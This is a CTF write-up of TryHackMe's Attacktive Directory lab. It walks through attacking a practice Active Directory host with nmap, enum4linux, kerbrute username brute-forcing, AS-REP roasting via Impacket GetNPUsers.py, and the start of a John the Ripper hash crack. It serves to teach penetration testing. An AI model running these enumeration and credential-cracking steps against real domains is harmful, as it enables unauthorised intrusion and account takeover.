Sign in Subscribe
CTF

Attacktive Directory | THM write-up

fr33s0ul

23 min read
Attacktive Directory | THM write-up

Hello world! today's challenge is very unique, we will go through the steps to exploit an active directory. The challenge is designed by a user called Sp00ky.
in my opinion, anyone who wants to get close to active directory exploitation this is the one for you, the amount of knowledge you'll learn is just amazing, because Active directories use different protocols. You'll learn a lot about Kerberos and how to crack their hashes, and how to use Impacket Secretsdump to dump Domain-Control hashes, and how to access the machine with only NTLM hash with Evil-WinRM ...

Enumeration
root@kali:~# nmap -p- -A -nP 10.10.203.152
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-17 10:37 UTC
Nmap scan report for 10.10.203.152
Host is up (0.00043s latency).
Not shown: 65508 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-17 10:43:23Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2020-04-17T10:45:49+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2020-04-03T18:40:09
|_Not valid after:  2020-10-03T18:40:09
|_ssl-date: 2020-04-17T10:46:02+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49684/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49789/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/17%Time=5E99884F%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
MAC Address: 02:41:2E:CE:EA:1A (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/17%OT=53%CT=1%CU=44531%PV=Y%DS=1%DC=D%G=Y%M=02412E%T
OS:M=5E998918%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=104%TI=I%CI=I%II=I
OS:%SS=S%TS=U)OPS(O1=M2301NW8NNS%O2=M2301NW8NNS%O3=M2301NW8%O4=M2301NW8NNS%
OS:O5=M2301NW8NNS%O6=M2301NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W
OS:6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M2301NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%
OS:O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=8
OS:0%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=
OS:Y%DFI=N%T=80%CD=Z)

Network Distance: 1 hop
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: ATTACKTIVEDIREC, NetBIOS user: <unknown>, NetBIOS MAC: 02:41:2e:ce:ea:1a (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-04-17T10:45:49
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 10.10.203.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 550.50 seconds
root@kali:~#

running nmap will help us gather a lot of information about the Active directory and our target in general. for the next step, we will take the DNS domain name and add it to /etc/hosts since we are practising in a local area network

root@kali:~# echo 10.10.237.175 spookysec.local >> /etc/hosts

The next step, enumerating the two ports used by AD 139 and 445 with enum4linux the flag -a stands for all simple enumeration, It will gather information for us including (userlist, machine list(s), sharelist, password policy information, group and member list, ...)

root@kali:~# enum4linux -a spookysec.local
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Apr 17 13:15:56 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... spookysec.local
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ======================================================= 
|    Enumerating Workgroup/Domain on spookysec.local    |
 ======================================================= 
[+] Got domain/workgroup name: THM-AD

 =============================================== 
|    Nbtstat Information for spookysec.local    |
 =============================================== 
Looking up status of 10.10.237.175
        ATTACKTIVEDIREC <00> -         B <ACTIVE>  Workstation Service
        THM-AD          <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        THM-AD          <1c> - <GROUP> B <ACTIVE>  Domain Controllers
        THM-AD          <1b> -         B <ACTIVE>  Domain Master Browser
        ATTACKTIVEDIREC <20> -         B <ACTIVE>  File Server Service

        MAC Address = 02-4D-80-A3-99-4E

 ======================================== 
|    Session Check on spookysec.local    |
 ======================================== 
[+] Server spookysec.local allows sessions using username '', password ''

 ============================================== 
|    Getting domain SID for spookysec.local    |
 ============================================== 
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)

 ========================================= 
|    OS information on spookysec.local    |
 ========================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for spookysec.local from smbclient: 
[+] Got OS info for spookysec.local from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ================================ 
|    Users on spookysec.local    |
 ================================ 
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ============================================ 
|    Share Enumeration on spookysec.local    |
 ============================================ 

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on spookysec.local

 ======================================================= 
|    Password Policy Information for spookysec.local    |
 ======================================================= 
[E] Unexpected error from polenum:


[+] Attaching to spookysec.local using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:SPOOKYSEC.LOCAL)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.


[E] Failed to get password policy with rpcclient


 ================================= 
|    Groups on spookysec.local    |
 ================================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ========================================================================== 
|    Users on spookysec.local via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================== 
[I] Found new SID: S-1-5-21-3591857110-2884097990-301047963
[I] Found new SID: S-1-5-21-3532885019-1334016158-1514108833
[+] Enumerating users using SID S-1-5-21-3532885019-1334016158-1514108833 and logon username '', password ''
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
S-1-5-21-3532885019-1334016158-1514108833-502 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-505 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-506 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-507 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-508 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-509 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-510 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-511 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-512 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)
S-1-5-21-3532885019-1334016158-1514108833-514 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-515 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-516 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-517 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-518 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-519 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-520 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-521 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-522 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-523 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-524 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-525 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-526 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-527 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-528 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-529 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-530 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-531 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-532 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-533 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-534 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-535 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-536 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-537 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-538 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-539 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-540 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-541 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-542 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-543 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-544 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-545 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-546 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-547 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-548 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-549 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-550 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1000 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1001 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1002 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1003 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1004 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1005 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1006 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1007 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1008 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1009 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1010 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1011 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1012 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1013 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1014 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1015 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1016 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1017 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1018 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1019 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1020 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1021 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1022 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1023 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1024 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1025 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1026 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1027 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1028 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1029 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1030 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1031 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1032 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1033 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1034 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1035 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1036 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1037 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1038 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1039 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1040 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1041 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1042 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1043 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1044 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1045 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1046 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1047 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1048 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1049 *unknown*\*unknown* (8)
S-1-5-21-3532885019-1334016158-1514108833-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-3591857110-2884097990-301047963 and logon username '', password ''
S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)
S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
S-1-5-21-3591857110-2884097990-301047963-503 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-504 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-505 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-506 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-507 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-508 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-509 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-510 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-511 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)
S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-523 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-524 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-528 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-529 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-530 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-531 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-532 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-533 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-534 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-535 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-536 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-537 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-538 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-539 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-540 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-541 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-542 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-543 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-544 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-545 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-546 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-547 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-548 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-549 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-550 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)
S-1-5-21-3591857110-2884097990-301047963-1001 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1002 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1003 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1004 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1005 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1006 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1007 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1008 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1009 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1010 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1011 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1012 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1013 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1014 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1015 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1016 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1017 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1018 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1019 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1020 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1021 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1022 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1023 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1024 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1025 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1026 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1027 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1028 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1029 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1030 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1031 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1032 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1033 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1034 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1035 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1036 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1037 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1038 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1039 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1040 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1041 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1042 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1043 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1044 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1045 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1046 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1047 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1048 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1049 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-1050 *unknown*\*unknown* (8)

 ================================================ 
|    Getting printer info for spookysec.local    |
 ================================================ 
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Fri Apr 17 13:16:10 2020

root@kali:~#

We gathered a lot of data that gave us more idea about the targeted AD since our tool failed to gain any credentials or usernames we will do that the hard way {Bruteforcing}, the next tool we'll be using is very powerful created by Ronnie Flathers, I would suggest checking the details about the tool on github, I'll leave the link at the end.

Let's get some usernames!
root@kali:~# kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt -t 100

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 04/17/20 - Ronnie Flathers @ropnop

2020/04/17 13:17:24 >  Using KDC(s):
2020/04/17 13:17:24 >   spookysec.local:88

2020/04/17 13:17:24 >  [+] VALID USERNAME:       james@spookysec.local
2020/04/17 13:17:24 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2020/04/17 13:17:24 >  [+] VALID USERNAME:       James@spookysec.local
2020/04/17 13:17:24 >  [+] VALID USERNAME:       robin@spookysec.local
2020/04/17 13:17:24 >  [+] VALID USERNAME:       darkstar@spookysec.local
2020/04/17 13:17:24 >  [+] VALID USERNAME:       administrator@spookysec.local
2020/04/17 13:17:24 >  [+] VALID USERNAME:       backup@spookysec.local
2020/04/17 13:17:24 >  [+] VALID USERNAME:       paradox@spookysec.local
2020/04/17 13:17:25 >  [+] VALID USERNAME:       JAMES@spookysec.local
2020/04/17 13:17:25 >  [+] VALID USERNAME:       Robin@spookysec.local
2020/04/17 13:17:27 >  [+] VALID USERNAME:       Administrator@spookysec.local
2020/04/17 13:17:29 >  [+] VALID USERNAME:       Darkstar@spookysec.local
2020/04/17 13:17:30 >  [+] VALID USERNAME:       Paradox@spookysec.local
2020/04/17 13:17:33 >  [+] VALID USERNAME:       DARKSTAR@spookysec.local
2020/04/17 13:17:34 >  [+] VALID USERNAME:       ori@spookysec.local
2020/04/17 13:17:35 >  [+] VALID USERNAME:       ROBIN@spookysec.local
2020/04/17 13:17:44 >  Done! Tested 100000 usernames (16 valid) in 20.383 seconds
root@kali:~#

The next step we will use GetNPUsers.py from Impacket to retrieve kerberos ticket and try to decrypt it.

root@kali:~# find / -type f -name 'GetNPUsers.py'
/usr/share/doc/python3-impacket/examples/GetNPUsers.py
root@kali:~# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx03300355dc7659423fe0e31a657e0b4c0b7e5b01803004807927ddaa362d14f16fa0f994cdafa7c6bae1ad9ffe50b362391fb16760cfa776f25a9c3b9edbd9784e68275d1d7e39d83688a78653c58d41622695800187dbbc87dd923e1e7eaf70a6a25bb0eabee8656ee3873d5be19e6e2b5a6f858a761a66b385f606d7fbb3e557d222d991fbd3a0fec7ce29db064500576c48881a9f4793259f3fbb8c79bd3dc8de6cd92fe64d30ea6e9e299d5335f115e201c1d9d7f7ec81c5d5663b926ee17c61ac742247762eca95393af92a57b07dbfcf5e8b5d45b1058d4ca2ac879556025d3247630cc43c033b7f672c8fe
root@kali:~#
root@kali:~# john kerbhash --wordlist=/root/passwordlist.txt 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
